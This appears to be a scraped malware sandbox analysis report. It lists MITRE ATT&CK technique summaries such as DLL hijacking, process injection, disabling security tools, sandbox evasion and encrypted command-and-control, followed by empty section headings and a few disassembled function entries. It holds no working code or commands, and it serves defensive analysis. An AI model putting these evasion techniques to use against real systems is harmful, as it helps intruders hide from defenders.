Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report malware

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

Function 000515B0, Relevance: 38.6, APIs: 21, Strings: 1, Instructions: 133
memorysynchronizationprocessCOMMON

Function 00051599, Relevance: 15.1, APIs: 10, Instructions: 86
memorysynchronizationCOMMON

Function 00051575, Relevance: 13.6, APIs: 9, Instructions: 73
memorysynchronizationCOMMON

Function 00059EE0, Relevance: 9.0, APIs: 6, Instructions: 40
memoryCOMMON

Function 00051F40, Relevance: 9.2, APIs: 6, Instructions: 163
librarymemoryloaderCOMMON

Function 00052110, Relevance: 6.0, APIs: 4, Instructions: 39
processCOMMON

Function 00056E70, Relevance: 4.2, APIs: 3, Instructions: 428
COMMONCrypto

Function 000577F0, Relevance: .6, Instructions: 581
COMMONCrypto